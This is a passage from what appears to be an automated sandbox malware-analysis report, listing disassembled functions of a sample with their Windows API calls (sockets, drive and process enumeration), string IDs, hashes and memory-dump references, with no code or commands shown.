                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            • Opcode ID: d3965cbfa22efb7f0c326dedc3c4e3ad5b74c3dbd0813a33a69ab1577dbb0350
                                                            • Instruction ID: b2b7e0571276bf2df24f38badf0dabb79162e2da4513f3f29f89146e71e355ca
                                                            • Opcode Fuzzy Hash: d3965cbfa22efb7f0c326dedc3c4e3ad5b74c3dbd0813a33a69ab1577dbb0350
                                                            • Instruction Fuzzy Hash: E021E671C08285AAF7229B58DC43FE673ACEF91338F040618F99853151FA32698587E2
                                                            Function 00FAD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 00FAD65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            • Opcode ID: 9416c5272a1852f5b5c30c57ef3be5df5a39df6f93f46f317acef136f3a2eb6b
                                                            • Instruction ID: 8b2469b1c47fe36f21549643d1e9d7b2947271e0e25991ea0ddb9b99b052cc99
                                                            • Opcode Fuzzy Hash: 9416c5272a1852f5b5c30c57ef3be5df5a39df6f93f46f317acef136f3a2eb6b
                                                            • Instruction Fuzzy Hash: F6017BD0D4434106F7127B38AC1B32632947F93304F442868EC8D96386F72CC59DC2A2
                                                            Function 0105AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0105AB9B
                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0105ABE4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocketsocket
                                                            • String ID:
                                                            • API String ID: 416004797-0
                                                            • Opcode ID: 71183ecaff37a0f63b1a221624d9aba0dfcdfe01732d227d833cb7f2f2c606a1
                                                            • Instruction ID: 9f477d075a56363eff10468d0b548121e29df193ff784a0b7eb60d4088808a3d
                                                            • Opcode Fuzzy Hash: 71183ecaff37a0f63b1a221624d9aba0dfcdfe01732d227d833cb7f2f2c606a1
                                                            • Instruction Fuzzy Hash: 99E19F70704302DBEB60CF18C884B6B7BE5EF85310F044A69EED99B291E775D944DB92
                                                            Function 06E0006E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: d4ff37a2266f47f711cf677ab14b7eac539623ee5165234120d656c013c99fa0
                                                            • Instruction ID: 419899716bfb45b776ddd880fb137b869df1a2dd25d989ce26b4b5b20be50058
                                                            • Opcode Fuzzy Hash: d4ff37a2266f47f711cf677ab14b7eac539623ee5165234120d656c013c99fa0
                                                            • Instruction Fuzzy Hash: 14416EEB64C311BE73C285956B58FFA6B6DE5CA730330A426F403D6583E2E44ACE11B1
                                                            Function 06E00314 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 0cc153a6aaa39fc333b909f236dcdbfb775079d89e51f818ce26ec18cf7603e8
                                                            • Instruction ID: ba6393441ad84a9606e27662a767a895c4dbdfd49dd3919e123c9b486493ba4a
                                                            • Opcode Fuzzy Hash: 0cc153a6aaa39fc333b909f236dcdbfb775079d89e51f818ce26ec18cf7603e8
                                                            • Instruction Fuzzy Hash: 3621B6AB608310BEB38385D15748BFA6B6DE9DB2303309472F503D6586E5D84FCA62B1
                                                            Function 00F978B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID: FD %s:%d sclose(%d)
                                                            • API String ID: 2781271927-3116021458
                                                            • Opcode ID: 86b1794bacd3f7fde29cf329943c71c31ca51680854e2f5600c658aef4916d03
                                                            • Instruction ID: 3941fdf8cffd2256fce8c548f47e7333fbf3eaae9b901ff682a2ced05fc776f8
                                                            • Opcode Fuzzy Hash: 86b1794bacd3f7fde29cf329943c71c31ca51680854e2f5600c658aef4916d03
                                                            • Instruction Fuzzy Hash: F8D05E33A293212B9A306A997C48C4B7BA8DEC6F60F060C59F9457B204E1209D0487F2
                                                            Function 0105B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0105B29E,?,00000000,?,?), ref: 0105B0BA
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,01043C41,00000000), ref: 0105B0C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastconnect
                                                            • String ID:
                                                            • API String ID: 374722065-0
                                                            • Opcode ID: d4b6802b637837e84782a744ab508d89a84ee872099aa641bd80e73875557c55
                                                            • Instruction ID: 5b42ccf64779b2443a8be2c95f3e4e9234dd8249d41e418309aa3eae958287d1
                                                            • Opcode Fuzzy Hash: d4b6802b637837e84782a744ab508d89a84ee872099aa641bd80e73875557c55
                                                            • Instruction Fuzzy Hash: F401D8363042009BDB605A68CC44F6BB7DAFF89274F140B54FDB8931D1D726F9508752
                                                            Function 06E40123 Relevance: 1.8, APIs: 1, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31e9d3a6fabb4b16daac631f62ecde79da7ffcaafa16c1893070da42ea321237
                                                            • Instruction ID: 13abdf9170edb1f3e8d9cb160c758c58185981cf949a60e85f704d4acd20cc14
                                                            • Opcode Fuzzy Hash: 31e9d3a6fabb4b16daac631f62ecde79da7ffcaafa16c1893070da42ea321237
                                                            • Instruction Fuzzy Hash: 995118EB10C3517DB382E7A17B54EFA6B6EE6D6370331943AF503C6242E2990E4E51B1
                                                            Function 06E400EB Relevance: 1.8, APIs: 1, Instructions: 302COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 60fff3d11be418c1b4e2d0a22c3dfae3152c3b962bd12a85ede20c774e138814
                                                            • Instruction ID: ddbd922ea971e587164da7d7c919c374d2a80e5e225ff580b3d6b9c7e5461237
                                                            • Opcode Fuzzy Hash: 60fff3d11be418c1b4e2d0a22c3dfae3152c3b962bd12a85ede20c774e138814
                                                            • Instruction Fuzzy Hash: E651C5EB14C310BDB3C2A6A17B54AFA6B6EE6D27707319436F603C6642E2944F4E50B1
                                                            Function 06E400D9 Relevance: 1.8, APIs: 1, Instructions: 301COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7a3f0697af8c074cc99b35db46919ab5eab483686ba4b7384c67bef3675409a
                                                            • Instruction ID: 8362c714617fdf88db4f7b0fdb4cee16f28a075e6c9f1ec235c72a220af7018a
                                                            • Opcode Fuzzy Hash: c7a3f0697af8c074cc99b35db46919ab5eab483686ba4b7384c67bef3675409a
                                                            • Instruction Fuzzy Hash: 5B51B4EB10C310BDB2C2A6A17B54AFB6B6EE6D27707319436F607C6642E2944F4E50B1
                                                            Function 06E400E2 Relevance: 1.8, APIs: 1, Instructions: 297COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 18eef4aef4e22d3fa3da4722bef84ad485eb2f7d825fc2836245c15ab4eb7dfe
                                                            • Instruction ID: dff184fed6f35ba7a9509ef7e39a72aef3657324f046466e101c1e78414309bb
                                                            • Opcode Fuzzy Hash: 18eef4aef4e22d3fa3da4722bef84ad485eb2f7d825fc2836245c15ab4eb7dfe
                                                            • Instruction Fuzzy Hash: AD51B5EB10C311BDB2C2A6617B54AFB6B6EE6D27707319436F603C2642E2944F4E51B1
                                                            Function 06E40110 Relevance: 1.8, APIs: 1, Instructions: 293COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 6f672f1316e1ca76044a7665d554abdd597d3ad96f891666f5759093930bf35e
                                                            • Instruction ID: 6754712081d230bc5d7f0a7969e087b2f6c56a67e5c587e618461bc13c1727af
                                                            • Opcode Fuzzy Hash: 6f672f1316e1ca76044a7665d554abdd597d3ad96f891666f5759093930bf35e
                                                            • Instruction Fuzzy Hash: 7D51A3EB14C311BDB282A6A17F54AFB6B6EE6D27707319436F603C2642E2940F4E50B1
                                                            Function 06E4019A Relevance: 1.8, APIs: 1, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 135839c48b22c1f35942105d335f70e0d94c365cb57fd727504db0d31395b416
                                                            • Instruction ID: ca546098ad56c0f999e8e0ed328663f490f98eec0de82b4e4afb46f2befa4957
                                                            • Opcode Fuzzy Hash: 135839c48b22c1f35942105d335f70e0d94c365cb57fd727504db0d31395b416
                                                            • Instruction Fuzzy Hash: 0D51D6EB14C3117DB282A6A17F54EFB6B6EE6D2770731A436F503C2642E2944E4E50B1
                                                            Function 06E4016E Relevance: 1.8, APIs: 1, Instructions: 279COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 26043ceef993079600da72eb03695c0e68f5eb934ad87ef4ca27f78e486c8cff
                                                            • Instruction ID: d7088899c2802f38c9ff1ba1f0a5197502907d5b2913335a99c5fac993f13492
                                                            • Opcode Fuzzy Hash: 26043ceef993079600da72eb03695c0e68f5eb934ad87ef4ca27f78e486c8cff
                                                            • Instruction Fuzzy Hash: 1E51B5EB14C3117DB282A6A17F14EFB6B6EE6D27707319436F503C2642E2984E4E50B1
                                                            Function 06E40188 Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 9987eb95ee9de4861ff5596fc7d3cad80f1247c69b5119d8931a90f79b7bc55b
                                                            • Instruction ID: 047e5b1dba96e3ccc3a910ebfc329c1ed8263177252a4d16b4ebf3a17d2c7b46
                                                            • Opcode Fuzzy Hash: 9987eb95ee9de4861ff5596fc7d3cad80f1247c69b5119d8931a90f79b7bc55b
                                                            • Instruction Fuzzy Hash: 6A51A3EB14C3117DB282A6A17F58FFB6B6EE6D27707319436F603C2542E2984E4E50B1
                                                            Function 06E401B4 Relevance: 1.8, APIs: 1, Instructions: 273COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a149b22fc039c9f0e75d94f366c266924583c5fc941e723b400385c92c9cab10
                                                            • Instruction ID: 4dea5b35e8ce21185366e77dd65945544dd479bc8c37d36fc6ed69a7e2896de8
                                                            • Opcode Fuzzy Hash: a149b22fc039c9f0e75d94f366c266924583c5fc941e723b400385c92c9cab10
                                                            • Instruction Fuzzy Hash: D651E3EB14C3117DB282A6A13B58FFB6B6EE6D27707319436F603C6542E2880F4E50B1
                                                            Function 06E401D5 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a7683207378dcbdc5e6dce5aa6ac810b30227f28f4a1d24df0101270f4f6cee7
                                                            • Instruction ID: 10f0b0c3a87fe628e3a3c7bb8b2da8e28fb84604ccec91e6bfc8a03316ad36e2
                                                            • Opcode Fuzzy Hash: a7683207378dcbdc5e6dce5aa6ac810b30227f28f4a1d24df0101270f4f6cee7
                                                            • Instruction Fuzzy Hash: A84194EB14C3117DB282A6A17B18FFB6B6EE6D27707319436F503C2542E7980E4E50B1
                                                            Function 06E401E6 Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ffb8ca4192d198dabb00aa653d576bb773798cea3d9868d8c6ec4abced5f70f5
                                                            • Instruction ID: c10f75730a8b983170b463a45eebebda7742d8b8103e932752ff1429747f7183
                                                            • Opcode Fuzzy Hash: ffb8ca4192d198dabb00aa653d576bb773798cea3d9868d8c6ec4abced5f70f5
                                                            • Instruction Fuzzy Hash: 8C41B4FB14C3217DB282A6A17B18EFB6B6EE6D27707319436F503C6542E7980E4E50B1
                                                            Function 06E40211 Relevance: 1.7, APIs: 1, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 0c0572f2fbaf00e1fb9ebbd83ccdfa1ca750b9f621de160528b525bb80243b24
                                                            • Instruction ID: a14a72e6ab0ab7b6ada105a45a48ca215635fd80279f3590b5ca6954507e478e
                                                            • Opcode Fuzzy Hash: 0c0572f2fbaf00e1fb9ebbd83ccdfa1ca750b9f621de160528b525bb80243b24
                                                            • Instruction Fuzzy Hash: DC41A5EB14C3117DB282A6A17B18FFB6B6EE6D27707319436F603C2542E7980E4E50B1
                                                            Function 06E4021E Relevance: 1.7, APIs: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 5c4d90729b22fe9ac58ea54952d9d22b14c833c36315fa9a34af7b8ac0b4ff44
                                                            • Instruction ID: 020c56e6a7f0df39619aae1b6109dcde8d5cab3a92780e35a2c8a1704ada3e87
                                                            • Opcode Fuzzy Hash: 5c4d90729b22fe9ac58ea54952d9d22b14c833c36315fa9a34af7b8ac0b4ff44
                                                            • Instruction Fuzzy Hash: C44185EB14C3117DB282A6617B58FFB6B6EE6D27707319436F503D2542E7880E4E50B1
                                                            Function 06E40242 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: f5a563d36f5bd69042a255936289f6dd692245c86d13295118a5ad882f5dc4d3
                                                            • Instruction ID: 05fa063bd3199163cb46c2fa3289ed9f53197ec46220c2743c65e9ed224b4d92
                                                            • Opcode Fuzzy Hash: f5a563d36f5bd69042a255936289f6dd692245c86d13295118a5ad882f5dc4d3
                                                            • Instruction Fuzzy Hash: 4B41B3EB10C3117DB282A6A17B58FFB6B6EE6D2770731943AF903C1542E3880E4A50B1
                                                            Function 06E402B1 Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67984387ece1f8283d4c90ec169d8ba1492beda52e6b030119e8ffe02761d547
                                                            • Instruction ID: 8b23fad0a26d0ab76db2b4bb909242ff48050d969414e00c50620648a15880a3
                                                            • Opcode Fuzzy Hash: 67984387ece1f8283d4c90ec169d8ba1492beda52e6b030119e8ffe02761d547
